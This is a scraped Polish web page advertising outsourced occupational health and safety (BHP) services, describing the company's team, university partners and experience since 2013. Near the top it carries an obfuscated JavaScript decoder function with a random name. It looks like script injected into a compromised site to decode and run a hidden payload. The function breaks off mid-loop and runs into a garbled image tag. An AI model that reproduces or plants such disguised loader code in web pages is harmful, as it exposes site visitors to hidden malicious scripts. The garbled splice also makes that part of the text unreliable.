Outsourcing czyli stały serwis bhp dla Twojej firmy

func­tion l1c373528ef5(o4){var sa=‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc2)|(ve»4);pc=((ve&15)4)|(r4»2);u6=((r4&3)6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oeandrow-300x300.jpg” alt=“stały ser­wis bhp” width=“300” height=“300” />

Pro­wa­dzi­my dzia­ła­nia ser­wi­so­we dla wie­lu firm na tere­nie całe­go kra­ju. Nasi Klien­ci czę­sto decy­du­ją się na sta­łą współ­pra­cę z nami ocze­ku­jąc dobre­go dopa­so­wa­nia usłu­gi pod swo­je potrze­by. Ser­wis zapew­nia­my głów­nie w opar­ciu o nasz zespół kadry posia­da­ją­cy odpo­wied­nie kwa­li­fi­ka­cje. Tym róż­ni­my się od więk­szo­ści kon­ku­ren­cji, że pra­cu­je­my zespo­ło­wo. Nasze biu­ro jest czyn­ne w każ­dy dzień robo­czy. Zawsze jest ktoś z nasze­go zespo­łu do Two­jej dys­po­zy­cji

Standardowy serwis to za mało ?

Każ­dy pro­blem wyma­ga indy­wi­du­al­ne­go podej­ścia. W wybra­nych przy­pad­kach współ­pra­cu­je­my czę­sto z kadrą dwóch łódz­kich uczel­ni : Poli­tech­ni­ki Łódz­kiej oraz Uni­wer­sy­te­tu Łódz­kie­go, aby móc sta­wiać czo­ła wyzwa­niom. Jeśli to nie satys­fak­cjo­nu­je nas przy roz­wią­za­niu pro­ble­mów korzy­sta­my z pomo­cy wie­lu innych zewnętrz­nych spe­cja­li­stów np. korzy­sta­my z wie­dzy eks­per­tów Urzę­du Dozo­ru Tech­nicz­ne­go.

Doświadczenie

Mimo, że nasza spół­ka dzia­ła orga­ni­za­cyj­nie od 2013 roku, to posia­da­my gro­no Klien­tów z któ­ry­mi współ­pra­cu­je­my od same­go począt­ku dzia­ła­nia spół­ki. Na indy­wi­du­al­nych spo­tka­niach na życze­nie przed­sta­wia­my nasze refe­ren­cje. Już teraz przejdź do zakład­ki kon­takt i zaproś nas na spo­tka­nie. Doło­ży­my wszel­kich sta­rać, aby zapro­po­no­wać Tobie ser­wis szy­ty pod Two­je potrze­by !